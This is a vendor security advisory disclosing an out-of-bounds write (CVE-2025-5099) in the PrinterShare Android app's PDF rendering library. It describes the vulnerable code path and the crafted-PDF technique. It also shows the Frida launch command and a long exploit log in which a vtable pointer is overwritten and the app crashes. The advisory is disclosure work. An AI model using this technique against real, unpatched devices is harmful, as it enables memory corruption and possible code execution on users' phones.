-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2025-004: Mobile Dynamix PrinterShare Mobile Print Out-of-bounds Write Title: Mobile Dynamix PrinterShare Mobile Print Out-of-bounds Write Advisory ID: KL-001-2025-004 Publication Date: 2025-05-22 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-004.txt 1. Vulnerability Details Affected Vendor: Mobile Dynamix Affected Product: PrinterShare Mobile Print Affected Version: up to 12.15.01 Platform: Android CWE Classification: CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, CWE-787: Out-of-bounds Write CVE ID: CVE-2025-5099 2. Vulnerability Description An Out of Bounds Write occurs when the native library attempts PDF rendering, which can be exploited to achieve memory corruption and potentially arbitrary code execution. 3. Technical Description * Performed on Android 13 aarch64 - Samsung Rooted (Galaxy Tab A7 Lite) * Using Frida client on Ubuntu 24.04 LTS - Frida server on Samsung Rooted Device. * Playstore location: https://play.google.com/store/apps/details?id=com.dynamixsoftware.printershare&hl=en-US * The target Activity is exported true. Which means any application may interact with it, given that permissions are provided. The ActivityPrintDocuments class processes PDF files through JNI calls to native libraries. The vulnerability exists in the native component (libpdfrender.so) that handles PDF rendering and can be triggered when processing PDF files with manipulated dimensions and structure. The vulnerability is accessible through the ActivityPrintDocuments class, which is launched when opening a PDF file: // From activityprintdocuments.java class j extends h { @Override public void a(Canvas canvas, boolean z2) { // ... int drawPage = PDFrender.drawPage(this.f5155a, iArr, fArr2, i3, bitmap); // ... } } The PDF rendering happens in class j (subclass of h), which calls the vulnerable native function: // From activityprintdocuments.java class j extends h { @Override public void a(Canvas canvas, boolean z2) { // ... int drawPage = PDFrender.drawPage(this.f5155a, iArr, fArr2, i3, bitmap); // ... } } The shared object function performs memory operations without proper validation, allowing attackers to manipulate memory via crafted inputs. undefined8 entry(long base_addr, int flag, char option) { // ... temp_long = *(long *)(base_addr + 0x90); *(undefined4 *)(temp_long + 0x18) = 0; // ... [Insufficient bounds checking on pointers] *(undefined8 *)(temp_long + 0x28) = 0; *(undefined8 *)(temp_long + 0x20) = 0; *(ulong *)(temp_long + 0x10) = temp_ulong; // ... } The Frida script hooks critical native functions in libpdfrender.so, particularly targeting Java_com_dynamixsoftware_printershare_PDFrender_drawPage. It creates a malformed PDF with extreme dimensions (values of 0x7FFFFFFF or INT_MAX) designed to trigger buffer overflows. When the drawPage native function is called with corrupted parameters; it leads to memory corruption. $ frida -U -f com.dynamixsoftware.printershare -l exploit.js ____ / _ | Frida 16.6.5 - A world-class dynamic instrumentation toolkit | (_| | > _ | Commands: /_/ |_| help -> Displays the help system . . . . object? -> Display information about 'object' . . . . exit/quit -> Exit . . . . . . . . More info at https://frida.re/docs/home/ . . . . . . . . Connected to SM T220 (id=R83X10JATAV) Spawning `com.dynamixsoftware.printershare`... Spawned `com.dynamixsoftware.printershare`. Resuming main thread! [SM T220::com.dynamixsoftware.printershare ]-> [!] Terminal exploitation initialized [!] Initiating terminal exploit sequence [*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$g.run [*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$h.a [*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$j.a [!] Creating terminal exploit PDF [+] Using existing exploit PDF [!] Launching with payload at /sdcard/Download/terminal_exploit.pdf [!] Called com.dynamixsoftware.printershare.ActivityPrintDocuments$g.run [+] Found libpdfrender.so at 0x75521e4000 [!] Found critical function pointer: 0x75521e4e98 ...SNIP... [!] Target function called [*] Original pageNum: 0x76b5496bc0 [-] Error modifying dimensions: Error: access violation accessing 0x0 [*] Flags changed: 0 -> 2065 [!] Called critical function: 0xb4000075790586a0 [*] Potential vtable: 0xb4000075790586a0 -> 0x762801f5a0 [!] Overwrote potential vtable with "AAAAAAAA" [!] MEMORY MODIFIED at 0xb4000075790586a0 (vtable pointer): BEFORE: 00000000 a0 f5 01 28 76 00 00 00 ...(v... AFTER: 00000000 00 40 41 41 41 41 41 41 .@AAAAAA [!] Corrupted 64-byte memory chunk starting at object [!] MEMORY MODIFIED at 0xb4000075790586a0 (object memory): BEFORE: 00000000 00 40 41 41 41 41 41 41 00 b8 e3 78 75 00 00 b4 .@AAAAAA...xu... 00000010 80 03 e9 29 76 00 00 b4 00 00 00 00 00 00 00 00 ...)v........... 00000020 80 00 00 00 fc ff ff ff 00 fe 3f d0 76 00 00 00 ..........?.v... 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ AFTER: 00000000 00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41 .@AAAAAA.@AAAAAA 00000010 00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41 .@AAAAAA.@AAAAAA 00000020 00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41 .@AAAAAA.@AAAAAA 00000030 00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41 .@AAAAAA.@AAAAAA [!] Target function returned: 0xffffffff [-] Post-function corruption error: Error: invalid operation Process crashed: Bad access due to invalid address *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** Build fingerprint: 'samsung/gta7litewifixx/gta7litewifi:13/TP1A.220624.014/T220XXS6CWL2:user/release-keys' Revision: '0' ABI: 'arm64' Processor: '4' Timestamp: 2025-03-03 09:31:59.556177436-0800 Process uptime: 4s Cmdline: com.dynamixsoftware.printershare pid: 31838, tid: 32000, name: Thread-17 >>> com.dynamixsoftware.printershare <<< uid: 10243 signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0041414141414000 x0 b4000075790586a0 x1 0000000000000003 x2 0000000000000000 x3 0000000000000000 x4 0000000000000000 x5 0000000000000000 x6 0000000000000000 x7 0000000000000000 x8 0000000000004200 x9 0000007627bdd114 x10 0000007553d43d50 x11 0000007553d43cd0 x12 0000000000000008 x13 00000076c4d36f78 x14 0000000000000010 x15 00000076d2300a00 x16 000000761084cf48 x17 00000076cd911f30 x18 0000000000000000 x19 0000000000000003 x20 b4000075790586a0 x21 4141414141414000 x22 000000760f393a40 x23 0000007553d47000 x24 0000000000000010 x25 00000076d22fe840 x26 0000000000000002 x27 0000007553d43ed0 x28 0000000000000010 x29 0000007553d43d40 lr 000000760fb92440 sp 0000007553d43d00 pc 0000007627bdd168 pst 0000000060000000 ...SNIP... 4. Mitigation and Remediation Recommendation No response from vendor. There are no known mitigations to end-users of the affected application versions. 5. Credit This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc. 6. Disclosure Timeline 2025-04-09 : KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com. 2025-04-11 : KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com. 2025-04-29 : KoreLogic submits vulnerability details to vendor via {info,support}@mobiledynamix.com. 2025-05-22 : KoreLogic public disclosure. 7. Proof of Concept URL: https://korelogic.com/Resources/Advisories/KL-001-2025-004.poc.js.txt SHA256sum: 8f1df24eb0027d8bfc13092988839c5f8a3fb39a57912d338af719b23d253b2c The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy -----BEGIN PGP SIGNATURE----- iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmgvotsaHGRpc2Nsb3N1 cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkenwfw//SoMz+7yoNwAwzkpP/HwF 1FcT3tbw8oEIivu+QhrPD0OZ6ns5J31oboe9kHDMp+f7k0CeEtGUxYcGs6p2AL27 8/u7WE5PyUZRYJe2GgxXKL75orHQfXi5X+misiDgHUH6FHWl1TyHcg8y4+nnXOqp dLSpGBZPUMpmKQ6pduqcWnLnOa1Hel2SmVginHcSDnvk4Zf8Qi0v9b4V8dGcWxux ECkOYzH9C8Pia7ZfUI1LUWHUXq0+UEM6iRIdMpijKR1kjeqNOzHgo84tNPkNgFxd Gs/JN7d0kmCTbt7MChueVrlyMj2bcr2RwQFfR3XimcNACW7gyLzfv9VizqKKym1W gEHAqXyI/wujzunDzcoRoPm4ETHM8eSoKzOcRSZu4sAmWUFckT9J1zpCw+3HpULY s5XF9EQJgvFX0ZVC/eIEG5W83+VV+u+HfRxggqt4gP8kRs3VJ5mVYy5S+kd+uCqL v/pM7bgW3/evdqotlfnTjnA4NlpNY+mXcKAiXN4X7DU/vXEeSEp34o0ahseZS7tE 8TqKPkBgygH6nBI29hVb1oAT6MVaH3xISJTJFUdtYjnjz1+e+i44bZIz4NjF6OAV dLLzb0cL4OeaTFiOQb1CsyqsxAWvyWMzPAwEY6QcnygYuLIZDna4NsgRNYgyIEl8 B8uwwXfOu/sQu8wutpYUhco= =0T51 -----END PGP SIGNATURE-----